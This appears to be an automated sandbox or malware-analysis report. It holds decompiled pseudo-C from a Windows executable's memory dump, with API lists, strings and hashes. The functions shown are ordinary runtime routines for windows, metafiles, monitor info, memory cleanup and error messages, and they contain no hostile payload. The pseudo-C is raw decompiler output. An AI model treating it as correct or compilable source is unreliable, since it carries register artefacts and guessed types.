Opcode ID: b2e8206069406c15c65b90cc8addb827f1f800e5ff77e72f2c4b474668f0a451
Instruction ID: 273a09859218ce63f1bfafcae5f04ae87a68ef2a4600b148fab80dafd7ffe561
Opcode Fuzzy Hash: b2e8206069406c15c65b90cc8addb827f1f800e5ff77e72f2c4b474668f0a451
Instruction Fuzzy Hash: CC611C707002089BDB01FBA5D881A9F76A6DB98304F50947FA641BB7C6DB3CDD0A879D

Uniqueness

Uniqueness Score: -1.00%

Function 00458D9C, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132windowCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00458DAF
GetWindowRect.USER32 ref: 00458E09
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 00458E41
MessageBoxA.USER32 ref: 00458E82
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,00458EF8,?,00000000,00458EF1), ref: 00458ED2
SetActiveWindow.USER32(?,00458EF8,?,00000000,00458EF1), ref: 00458EE3

Strings

(, xrefs: 00458DE6

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Active$MessageRect
String ID: (
API String ID: 3147912190-3887548279
Opcode ID: bb7b641037468d0aa0f14dd517f3210ed0a3fb8b6c72f816e43f4588c51c043c
Instruction ID: 1d93de7175724da21c6f79ece6a8f35b9b607821a3a8e229c81cba6dd8a53d00
Opcode Fuzzy Hash: bb7b641037468d0aa0f14dd517f3210ed0a3fb8b6c72f816e43f4588c51c043c
Instruction Fuzzy Hash: FB412B75E00108AFDB04DBA9DD82FAEB7F9EB48305F544469F904FB392DA78AD048B54

Uniqueness

Uniqueness Score: -1.00%

Function 00422B3E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00422B3E(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E004229DC(__eax);
				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00421384( &_v38) != _v18) {
					E00420534();
				}
				_v12 = _v12 - 0x16;
				_v16 = E0040272C(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x422caf, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E00420534();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E00420534();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(E00422CB6);
				return E0040274C(_v16);
			}

0x00422b41
0x00422b43
0x00422b4c
0x00422b4f
0x00422b52
0x00422b56
0x00422b68
0x00422b72
0x00422b82
0x00422b82
0x00422b87
0x00422b93
0x00422b96
0x00422ba4
0x00422bb2
0x00422bbc
0x00422bc5
0x00422bc7
0x00422bc7
0x00422be7
0x00422c04
0x00422c07
0x00422c10
0x00422c15
0x00422c1a
0x00422c30
0x00422c32
0x00422c37
0x00422c39
0x00422c39
0x00422c4b
0x00422c50
0x00422c5a
0x00422c60
0x00422c65
0x00422c6c
0x00422c84
0x00422c86
0x00422c8b
0x00422c8d
0x00422c8d
0x00422c92
0x00422c98
0x00422c9b
0x00422c9e
0x00422cae

APIs

MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422BE2
MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422BFF
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422C2B
GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422C4B
DeleteEnhMetaFile.GDI32(00000016), ref: 00422C6C
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 00422C7F

Strings

`, xrefs: 00422BC7

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: FileMeta$Bits$DeleteHeader
String ID: `
API String ID: 1990453761-2679148245
Opcode ID: 20b27c1916447554c158e12bc0e5177018617998fa4349a35a51e213a0597214
Instruction ID: c82343abd7adaf3e154e095d2a046cf7e7ae946fc2d083665f50bfb9f875c777
Opcode Fuzzy Hash: 20b27c1916447554c158e12bc0e5177018617998fa4349a35a51e213a0597214
Instruction Fuzzy Hash: CE415F75E00218AFDB00DFA9D585AAFB7F8EF48710F50846AF904E7241E7789D40CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00422B40, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00422B40(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E004229DC(__eax);
				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00421384( &_v38) != _v18) {
					E00420534();
				}
				_v12 = _v12 - 0x16;
				_v16 = E0040272C(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x422caf, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E00420534();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E00420534();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(E00422CB6);
				return E0040274C(_v16);
			}

APIs

MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422BE2
MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422BFF
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422C2B
GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422C4B
DeleteEnhMetaFile.GDI32(00000016), ref: 00422C6C
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 00422C7F

Strings

`, xrefs: 00422BC7

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: FileMeta$Bits$DeleteHeader
String ID: `
API String ID: 1990453761-2679148245
Opcode ID: 9b867f333f1f564f642fcd9f62278e86d6935eb2a94e92128bebbecc616af6ef
Instruction ID: dbb885034a11e416cf359662c0241dfb07ced1ea5db72ea36fee94960fa49253
Opcode Fuzzy Hash: 9b867f333f1f564f642fcd9f62278e86d6935eb2a94e92128bebbecc616af6ef
Instruction Fuzzy Hash: AC415EB5E00218AFDB00DFA9D585AAFB7F8EF48710F50846AF904E7241E7789D40CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00426CD4, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00426CD4(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x48fac0 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A30();
						}
						_t24 = 1;
					}
				} else {
					 *0x48faa4 = E004269A4(4, _t23,  *0x48faa4, _t27, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}

0x00426cdd
0x00426ce0
0x00426cea
0x00426d0f
0x00426d17
0x00426d37
0x00426d3c
0x00426d47
0x00426d52
0x00426d5c
0x00426d5d
0x00426d5e
0x00426d5f
0x00426d60
0x00426d61
0x00426d6b
0x00426d6d
0x00426d75
0x00426d76
0x00426d76
0x00426d7b
0x00426d7b
0x00426cec
0x00426cfe
0x00426d0b
0x00426d0b
0x00426d85

APIs

GetMonitorInfoA.USER32(?,?), ref: 00426D05
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00426D2C
GetSystemMetrics.USER32 ref: 00426D41
GetSystemMetrics.USER32 ref: 00426D4C
lstrcpy.KERNEL32(?,DISPLAY), ref: 00426D76

Part of subcall function 004269A4: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426A24

Strings

GetMonitorInfo, xrefs: 00426CEC
DISPLAY, xrefs: 00426D6D

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfo
API String ID: 1539801207-1633989206
Opcode ID: 442bf4c7b27feae412d6deafb1840d3d16e016222d5d5be792021c47c23c3196
Instruction ID: 70329c667c102f1d1686fafe4f663fbfb876fa39692c13fdff9f80d6ee16b7cd
Opcode Fuzzy Hash: 442bf4c7b27feae412d6deafb1840d3d16e016222d5d5be792021c47c23c3196
Instruction Fuzzy Hash: 061103317207285FD7208F60AC407ABB7E8EF45720F41493EEC5ADB6D0D774A8488BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00426E7C, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00426E7C(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x48fac2 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A30();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x48faac; // 0x426e7c
					 *0x48faac = E004269A4(6, _t23, _t26, _t27, _t29);
					_t24 =  *0x48faac(_t27, _t29);
				}
				return _t24;
			}

0x00426e85
0x00426e88
0x00426e92
0x00426eb7
0x00426ebf
0x00426edf
0x00426ee4
0x00426eef
0x00426efa
0x00426f04
0x00426f05
0x00426f06
0x00426f07
0x00426f08
0x00426f09
0x00426f13
0x00426f15
0x00426f1d
0x00426f1e
0x00426f1e
0x00426f23
0x00426f23
0x00426e94
0x00426e99
0x00426ea6
0x00426eb3
0x00426eb3
0x00426f2d

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00426ED4
GetSystemMetrics.USER32 ref: 00426EE9
GetSystemMetrics.USER32 ref: 00426EF4
lstrcpy.KERNEL32(?,DISPLAY), ref: 00426F1E

Part of subcall function 004269A4: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426A24

Strings

|nB, xrefs: 00426E99, 00426EA6, 00426EAD
DISPLAY, xrefs: 00426F15
GetMonitorInfoW, xrefs: 00426E94

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoW$|nB
API String ID: 2545840971-1846980206
Opcode ID: c87b940dbd07c2bfcf89ac0dc78d6044fa41d1b97f3d01697760af4b7d25a718
Instruction ID: 7ee13f8ede422b036e26cfe3dbe816272876cafd8fc96b7b8b8928e94d75882a
Opcode Fuzzy Hash: c87b940dbd07c2bfcf89ac0dc78d6044fa41d1b97f3d01697760af4b7d25a718
Instruction Fuzzy Hash: 7411E4727003215FDB208F65BD447ABBBE8EB05720F42483FED59D7680D774A8488BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401B3C, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00401B3C() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x48f5bc == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push("�1!");
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x48f049 != 0) {
						_push(0x48f5c4);
						L004013D4();
					}
					 *0x48f5bc = 0;
					_t3 =  *0x48f61c; // 0x84ec80
					LocalFree(_t3);
					 *0x48f61c = 0;
					_t19 =  *0x48f5e4; // 0x84e364
					while(_t19 != 0x48f5e4) {
						VirtualFree( *(_t19 + 8), 0, 0x8000);
						_t19 =  *_t19;
					}
					E0040143C(0x48f5e4);
					E0040143C(0x48f5f4);
					E0040143C(0x48f620);
					_t14 =  *0x48f5dc; // 0x84dd30
					while(_t14 != 0) {
						 *0x48f5dc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x48f5dc; // 0x84dd30
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401c19);
					if( *0x48f049 != 0) {
						_push(0x48f5c4);
						L004013DC();
					}
					_push(0x48f5c4);
					L004013E4();
					return 0;
				}
			}

0x00401b3d
0x00401b47
0x00401c1b
0x00401b4d
0x00401b4f
0x00401b50
0x00401b55
0x00401b58
0x00401b62
0x00401b64
0x00401b69
0x00401b69
0x00401b6e
0x00401b75
0x00401b7b
0x00401b82
0x00401b87
0x00401ba1
0x00401b9a
0x00401b9f
0x00401b9f
0x00401bae
0x00401bb8
0x00401bc2
0x00401bc7
0x00401bce
0x00401bd2
0x00401bd9
0x00401bde
0x00401be3
0x00401be9
0x00401bec
0x00401bef
0x00401bfb
0x00401bfd
0x00401c02
0x00401c02
0x00401c07
0x00401c0c
0x00401c11
0x00401c11

APIs

RtlEnterCriticalSection.KERNEL32(0048F5C4,00000000,1!), ref: 00401B69
LocalFree.KERNEL32(0084EC80,00000000,1!), ref: 00401B7B
VirtualFree.KERNEL32(?,00000000,00008000,0084EC80,00000000,1!), ref: 00401B9A
LocalFree.KERNEL32(0084DD30,?,00000000,00008000,0084EC80,00000000,1!), ref: 00401BD9
RtlLeaveCriticalSection.KERNEL32(0048F5C4,00401C19,0084EC80,00000000,1!), ref: 00401C02
RtlDeleteCriticalSection.KERNEL32(0048F5C4,00401C19,0084EC80,00000000,1!), ref: 00401C0C

Strings

1!, xrefs: 00401B50

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID: 1!
API String ID: 3782394904-1845855088
Opcode ID: a7361d0fbc37425bebf4c20655fdede4a4a5256c0d26f7f00e9cd322aaf61a04
Instruction ID: d0eebec53db1036aff4e7e33b7afbe77398a87a474722909e96e0089e20a6b67
Opcode Fuzzy Hash: a7361d0fbc37425bebf4c20655fdede4a4a5256c0d26f7f00e9cd322aaf61a04
Instruction Fuzzy Hash: 0411BE746442406EE701BF66E896B1E37949741708F50883FF500F66F3E67C9858CB1C

Uniqueness

Uniqueness Score: -1.00%

Function 0040A034, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A034(void* __edi) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t10;
				char* _t12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t22;
				long _t26;
				void* _t34;

				E00409EAC(_t10,  &_v1024, _t34, 0x400);
				_t12 =  *0x48e74c; // 0x48f048
				if( *_t12 == 0) {
					_t14 =  *0x48e530; // 0x4074e8
					_t7 = _t14 + 4; // 0xffe8
					_t16 =  *0x48f714; // 0x400000
					LoadStringA(E00405A84(_t16),  *_t7,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t22 =  *0x48e578; // 0x48f218
				E00402D0C(_t22);
				_t26 = E00408B78( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff5),  &_v1024, _t26,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff5), 0x40a0e4, 2,  &_v1092, 0);
			}

0x0040a043
0x0040a048
0x0040a050
0x0040a0a3
0x0040a0a8
0x0040a0ac
0x0040a0b7
0x00000000
0x0040a0cd
0x0040a052
0x0040a057
0x0040a067
0x0040a07a
0x00000000

APIs

Part of subcall function 00409EAC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409EC9
Part of subcall function 00409EAC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409EED
Part of subcall function 00409EAC: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F08
Part of subcall function 00409EAC: LoadStringA.USER32 ref: 00409F9E

GetStdHandle.KERNEL32(000000F5,?,00000000,?,00000000), ref: 0040A074
WriteFile.KERNEL32(00000000,000000F5,?,00000000,?,00000000), ref: 0040A07A
GetStdHandle.KERNEL32(000000F5,0040A0E4,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A08F
WriteFile.KERNEL32(00000000,000000F5,0040A0E4,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A095
LoadStringA.USER32 ref: 0040A0B7
MessageBoxA.USER32 ref: 0040A0CD

Strings

t@, xrefs: 0040A0A3

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandleLoadModuleNameStringWrite$MessageQueryVirtual
String ID: t@
API String ID: 1802973324-3653134846
Opcode ID: ef5f8adcb6f50fb5679c8d5e7840b98d09c1caf67b8db00904dcff90053b6e15
Instruction ID: fb73d73ca137ca81705e81f0ff4ae51e8c88a69936e53d0168864f330ca2a175
Opcode Fuzzy Hash: ef5f8adcb6f50fb5679c8d5e7840b98d09c1caf67b8db00904dcff90053b6e15
Instruction Fuzzy Hash: B20165B25543047AD300E755CC42F9B77AC9B45704F40863FB354F60E1DA78D854872A

Uniqueness

Uniqueness Score: -1.00%

Function 004041A4, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004041A4(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x48f048 == 0) {
					if( *0x47101c == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x48f21c == 0xd7b2 &&  *0x48f224 > 0) {
						 *0x48f234();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E0040422C, 2,  &_v4, 0);
				}
			}

0x004041ac
0x0040420c
0x0040421c
0x0040421c
0x00404222
0x004041ae
0x004041b7
0x004041c7
0x004041c7
0x004041e3
0x00404204
0x00404204

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,00470838,00000000,?,00404272,?,?,?,00000001,00404312,0040283B,00402883,?,00000000), ref: 004041DD
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,00470838,00000000,?,00404272,?,?,?,00000001,00404312,0040283B,00402883), ref: 004041E3
GetStdHandle.KERNEL32(000000F5,0040422C,00000002,00470838,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,00470838,00000000,?,00404272), ref: 004041F8
WriteFile.KERNEL32(00000000,000000F5,0040422C,00000002,00470838,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,00470838,00000000,?,00404272), ref: 004041FE
MessageBoxA.USER32 ref: 0040421C

Strings

Runtime error at 00000000, xrefs: 004041D6, 00404215
Error, xrefs: 00404210

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 086065cfa382f18c9e52c9debb0f566a1e8409acf9ec44d4572f6f39407eb412
Instruction ID: e432b2e05938e5463cbeb2a0c2c49af9b48533dd01d92f2a06687db0b3d26f54
Opcode Fuzzy Hash: 086065cfa382f18c9e52c9debb0f566a1e8409acf9ec44d4572f6f39407eb412
Instruction Fuzzy Hash: FBF096B469138435EB2073A96D06FDD22484785B19F204BBFF314F44F296BC54C8571D

Uniqueness

Uniqueness Score: -1.00%

Function 004463E8, Relevance: 12.2, APIs: 8, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E004463E8(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t46;
				void* _t57;
				intOrPtr _t85;
				intOrPtr _t96;
				void* _t117;
				void* _t118;
				void* _t127;
				struct HDC__* _t136;
				struct HDC__* _t137;
				intOrPtr* _t138;
				void* _t139;

				_t119 = __ecx;
				_t135 = __ecx;
				_v8 = __edx;
				_t118 = __eax;
				_t46 = E00445BB0(__eax);
				if(_t46 != 0) {
					_t142 = _a4;
					if(_a4 == 0) {
						__eflags =  *((intOrPtr*)(_t118 + 0x54));
						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
							_t138 = E00424120(1);
							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
							E00425598(_t138, 1);
							 *((intOrPtr*)( *_t138 + 0x40))();
							_t119 =  *_t138;
							 *((intOrPtr*)( *_t138 + 0x34))();
						}
